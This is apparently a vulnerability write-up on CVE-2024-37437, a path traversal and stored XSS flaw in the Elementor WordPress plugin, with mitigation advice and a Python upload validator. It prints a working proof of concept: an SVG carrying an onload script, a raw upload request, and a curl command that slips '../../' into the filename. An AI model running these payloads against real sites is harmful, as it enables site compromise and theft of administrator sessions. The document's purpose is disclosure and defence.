CVE-2024-37437 - Exploiting Path Traversal and Stored XSS in Elementor Website Builder (<= 3.22.1)
Elementor Website Builder is one of the most popular WordPress plugins, empowering over five million sites. Unfortunately, Elementor has had its fair share of security issues. One particularly worrying vulnerability—CVE-2024-37437—opens the door to both path traversal and stored cross-site scripting (XSS).
In this post, we’ll break down what happened, show you how the vulnerability works, demo exploitation with code snippets, and give you links to the original references. If you’re using Elementor 3.22.1 or below, you’re at risk and need to know this.
- Versions affected: all up to 3.22.1
- Impact: attackers can upload malicious files outside the intended directory, leading to persistent XSS.
What is CVE-2024-37437?
CVE-2024-37437 is a combo bug: it’s an improper limitation of a pathname to a restricted directory (a “path traversal”) vulnerability that happens during certain file uploads in Elementor’s backend. Because the plugin fails to properly sanitize file paths, attackers can smuggle files into unexpected places.
On top of that, crafty attackers can upload files (like crafted SVGs) that inject JavaScript into stored locations. Since Elementor displays these files in posts or pages, victims hit XSS just by visiting the site, no need to click anything.
1. A user uploads a file via Elementor (for example, through the media flow).
2. The file path isn’t sanitized: user-controlled input can contain path traversal strings like ../../.
3. A malicious SVG or HTML file is uploaded with an XSS payload.
4. Elementor displays the file inside a page/post—now the attacker’s JavaScript runs for everyone who visits.
1. Create a file called evil.svg with a stored XSS payload
<!-- evil.svg -->
<svg xmlns="http://www.w3.org/2000/svg" onload="alert('XSS by CVE-2024-37437')"/>
2. Malicious Upload Request
Normally, Elementor restricts file upload paths. Due to path traversal, attackers can POST a request (using Burp Suite, curl, or Postman) like:
POST /wp-admin/admin-ajax.php?action=elementor_upload
Cookie: [Your WordPress auth]
Content-Type: multipart/form-data; boundary=---------------------------boundary
-----------------------------boundary
Content-Disposition: form-data; name="file"; filename="../../evil.svg"
Content-Type: image/svg+xml
[SVG file contents here]
-----------------------------boundary--
Notice the ../../ in the filename. This tricks Elementor into saving the file a couple of directories up, possibly into /wp-content/uploads/evil.svg (or somewhere worse).
3. Reference the File in Elementor Content
Add an <img src="/wp-content/uploads/evil.svg"> tag, or use Elementor’s UI to include the file where that is possible. Since Elementor in some contexts lets admins (or editors) pick uploaded files, clicking through the media library and adding it is trivial.
4. Stored XSS Hits All Visitors
Now, every time a user with higher permission (like an admin) visits the post/page, the JavaScript runs. If site visitors see the post, they’re at risk too.
Here’s a full PoC using curl:
# 1. Log into your WordPress site as a user with file upload rights
# 2. Upload the malicious SVG with path traversal
curl -b "wordpress_logged_in_cookie" -F 'file=@evil.svg;filename=../../evil.svg;type=image/svg+xml' \
"https://victim-site.com/wp-admin/admin-ajax.php?action=elementor_upload"
# 3. Add <img src="/wp-content/uploads/evil.svg"> to a post/page (through the Elementor editor)
# 4. View the page—the alert pops up, confirming XSS
Impact
- Stored, persistent XSS: the malicious code remains in the post/page.
- Path traversal: files can overwrite or publish sensitive files outside the upload directories.
- Privilege escalation: if an attacker’s XSS payload targets an admin, they might steal cookies, deface the site, or even command WordPress through the session.
Mitigation
- Update Elementor to the latest version immediately (3.22.2 or higher, as soon as patched).
- Audit file uploads: only allow trusted users/roles and restrict the allowed file types.
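To make the two mitigations concrete, here is an added example of the checks an upload handler should apply before writing a file; it is not Elementor’s code, and UPLOAD_ROOT, the allowed extension set and the sample SVGs are assumptions constructed for the demo. The first function rejects any client-supplied filename carrying path separators or “..” and confirms the resolved target stays inside the uploads directory; the second refuses an SVG that carries event handlers, script elements or javascript: URLs, which is exactly the onload trick the PoC above relies on.

```python
import re
import xml.etree.ElementTree as ET
from pathlib import Path

UPLOAD_ROOT = Path("/var/www/html/wp-content/uploads")  # assumed; adjust per site
# SVG is accepted only after svg_findings() passes; drop it here for the strictest policy.
ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif", ".webp", ".svg"}

# Constructed samples: the first mirrors the evil.svg payload from the PoC.
EVIL_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>'
CLEAN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="4"/></svg>'


def safe_upload_path(user_filename: str, upload_root: Path = UPLOAD_ROOT) -> Path:
    """Map a client-supplied filename to a path inside upload_root or raise ValueError."""
    # Reject traversal outright (it is an attack signal worth logging, not something to normalise).
    if "/" in user_filename or "\\" in user_filename or ".." in user_filename:
        raise ValueError("path separator or '..' in filename")
    if not re.fullmatch(r"[A-Za-z0-9][A-Za-z0-9._-]{0,200}", user_filename):
        raise ValueError("filename empty or contains disallowed characters")
    if Path(user_filename).suffix.lower() not in ALLOWED_EXT:
        raise ValueError(f"extension {Path(user_filename).suffix!r} not allowed")
    root = upload_root.resolve()
    target = (root / user_filename).resolve()
    if target.parent != root:  # defence in depth: resolved path must be a direct child
        raise ValueError("resolved path escapes the upload directory")
    return target


def svg_findings(data: bytes) -> list:
    """List reasons an SVG is unsafe to serve inline; an empty list means nothing was found."""
    try:
        root = ET.fromstring(data)  # stdlib parser; it does not fetch external entities
    except ET.ParseError as exc:
        return [f"malformed XML: {exc}"]
    findings = []
    for el in root.iter():
        tag = el.tag.rsplit("}", 1)[-1].lower()  # strip the namespace prefix
        if tag in ("script", "foreignobject"):
            findings.append(f"<{tag}> element")
        for attr, value in el.attrib.items():
            name = attr.rsplit("}", 1)[-1].lower()
            if name.startswith("on"):
                findings.append(f"event handler {name} on <{tag}>")
            if value.strip().lower().startswith("javascript:"):
                findings.append(f"javascript: URL in {name} on <{tag}>")
    return findings


def check_upload(user_filename: str, data: bytes):
    """Run both checks; returns (accepted, reason_or_target_path)."""
    try:
        target = safe_upload_path(user_filename)
    except ValueError as exc:
        return False, str(exc)
    if target.suffix.lower() == ".svg":
        problems = svg_findings(data)
        if problems:
            return False, "; ".join(problems)
    return True, str(target)
```

Wire check_upload() in front of the write and log every rejection with the submitted filename; a burst of "path separator or '..' in filename" rejections from one account is the detection signal for an attempt like the request above.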
References
- NVD Listing for CVE-2024-37437
- WPScan Advisory DB Entry
- Elementor Changelog
- Path Traversal Attacks Explained (OWASP)
- SVG XSS Vector Reference
Conclusion
CVE-2024-37437 is a classic—and dangerous—WordPress plugin bug that combines a simple file path oversight with the power of XSS. Update your Elementor now, and remember: sanitizing user input and paths isn’t optional, it’s essential.
---
Timeline
Published on: 07/09/2024 11:15:14 UTC
Last modified on: 08/29/2024 18:51:10 UTC